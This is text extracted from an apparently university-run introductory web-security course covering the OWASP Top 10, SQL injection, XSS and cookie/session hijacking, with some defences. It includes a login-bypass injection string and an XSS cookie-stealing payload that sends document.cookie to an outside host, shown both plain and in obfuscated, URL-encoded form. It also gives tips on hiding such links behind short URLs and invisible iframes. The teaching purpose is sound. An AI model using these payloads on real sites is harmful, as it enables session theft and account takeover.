中央大學(xué)電子計算機(jī)中心

「多媒體與網(wǎng)路應(yīng)用」

資訊推廣課程網(wǎng)頁應(yīng)用程式的安全入門Agenda嘴砲OWSAPTop10SQLinjectionXSScookie&session2Agenda嘴砲OWSAPTop10SQLinjectionXSScookie&session3不要做壞事！4不要被抓到！5不要被抓到！6不要說我教的7Agenda嘴砲OWSAPTop10SQLinjectionXSScookie&session8網(wǎng)頁安全？早年vs現(xiàn)代靜態(tài)vs動態(tài)有程式就有漏洞!9waystoattackOSwebserverwebapplication10attackscenariosattackwebserver

gainprivilege

stealinformations

toattackusersattackotheruser

stealinformations

executeotherattacksmaybecomposite11Agenda嘴砲OWSAPTop10SQLinjectionXSScookie&session1213OWASPTop10-2010A1:InjectionA2:Cross-SiteScripting(XSS)A3:BrokenAuthenticationandSessionManagementA4:InsecureDirectObjectReferencesA5:Cross-SiteRequestForgery(CSRF)14OWASPTop10-2010A6:SecurityMisconfigurationA7:InsecureCryptographicStorageA8:FailuretoRestrictURLAccessA9:InsufficientTransportLayerProtectionA10:UnvalidatedRedirectsandForwards15OWASPTop10-2010A1:InjectionA2:Cross-SiteScripting(XSS)A3:BrokenAuthenticationandSessionManagementA4:InsecureDirectObjectReferencesA5:Cross-SiteRequestForgery(CSRF)16OWASPTop10-2010A6:SecurityMisconfigurationA7:InsecureCryptographicStorageA8:FailuretoRestrictURLAccessA9:InsufficientTransportLayerProtectionA10:UnvalidatedRedirectsandForwards17Agenda嘴砲OWSAPTop10SQLinjectionXSScookie&session18Injections駭客的填空遊戲wherecanattackerinject?

database(MySQL,MSSQL,PostgreSQL...)

no-sql

DirectoryService(LDAP)

systemcommand!!19howSQLworksinwebloginpageforexampleclientwebserversqlserverrequestwhitidandpwdselectfromaccountwhere`id`=idand`pwd`=pwdreturnresultreturnloginsuccess/failed20WhySQL?廣大使用儲存大量的網(wǎng)站資料injectionfriendly21howinjectionswork?以MySQL為例子$query=“selectfromaccountwhere`id`=’$id’and`pwd`=’$pwd’

$id=’or1=1--

>selectfromaccountwhere`id`=’’--22attackskillsunionblindattack23影響資料被偷/被改獲得網(wǎng)站權(quán)限整個網(wǎng)站被拿下#24howtodefensesafeAPI過濾逃脫字元不要直接把使用者輸入加入query找程式掃描弱點(diǎn)25Practice26Agenda嘴砲OWSAPTop10SQLinjectionXSScookie&session27XSSCrossSiteScripting在別人的網(wǎng)站上寫程式！28backgroundknowledgeHTTPGETHTTPPOST29howtoattackattackusingPOST/GETthe“scripting”intheserverstrangeurl30howtoattackjavascript<iframe>/<image>31example<body><?echo“Hello”.$_GET[‘id’].”;?></body>/?id=<script>alert(“i’mOrange”)</script>32whatmayhappened?takeyoutobadsitesendyourinformationtoattackerJustForFun!33JustForFunSamyMySpaceXSSattackSamyismyhero!Infection34BigSitealsoXSSableMySpaceFacebooktwitterPlurk...35howtodefenseforserver該逃的還是要逃找程式掃描弱點(diǎn)foruser看到奇怪連結(jié)要警覺瀏覽器/防毒軟體36practice37Agenda嘴砲OWSAPTop10SQLinjectionXSScookie&session38backgroundknowledgecookie

session

Acookieisapieceoftextstoredbyauser'swebbrowser.Acookiecanbeusedforauthentication,storingsitepreferences,shoppingcartcontents,theidentifierforaserver-basedsession,oranythingelsethatcanbeaccomplishedthroughstoringtextdata.Thesessioninformationisstoredonthewebserverusingthesessionidentifier(sessionID)generatedasaresultofthefirst(sometimesthefirstauthenticated)requestfromtheenduserrunningawebbrowser.The"storage"ofsessionIDsandtheassociatedsessiondata(username,accountnumber,etc.)onthewebserverisaccomplishedusingavarietyoftechniquesincluding,butnotlimitedto:localmemory,flatfiles,anddatabases.394041如果偷到了cookie可以42howtostealit?4344把cookie送到雲(yún)端!用GET/POST方式讓網(wǎng)頁把cookie送走<img>/<iframe>

ex:["<imgsrc='http://in1.ncu.cc/~975002063/keke/t.php?t=",document.cookie,">"].join(seversideissimple

justkeepthecookie45哪個白癡

會點(diǎn)這鬼連結(jié)/?samname=%22%3E%3Cscript%3Edocument.write%28[String.fromCharCode%2860,105,109,103,32,115,114,99,61,39,104,116,116,112,58,47,47,105,110,49,46,110,99,117,46,99,99,47,126,57,55,53,48,48,50,48,54,51,47,107,101,107,101,47,116,46,112,104,112,63,116,61,34%29,document.cookie,String.fromCharCode%2834,39,62%29].join%28%29%29;%3C/script%3E%3C%2246hidden有種東西叫短網(wǎng)址

(/0rz.tw/goo.gl/bit.ly)塞進(jìn)別的網(wǎng)頁裡

(ex:iframe長寬設(shè)0或1)uglyurlEVERYWHERE/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=http%3A%2F%2F%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&bsv=1eic6yu9oa4y3&scc=1<mpl=default<mplcache=2/config/login?.intl=tw&.pd=c%3d7pP3Kh2p2e4XklntZWWfDLAC8w--&.done=/cgi-bin/kcookie.cgi/www/http%3a//&rl=147防範(fàn)鎖定useragent/header綁IP*不要被攻擊成功*48鎖定useragent/headerif(isset($_SESSION['HTTP_USER_AGENT'])){if($_SESSION['HTTP_USER_AGENT']!=md5($_SERVER['HTTP_USER_AGENT'])){exit();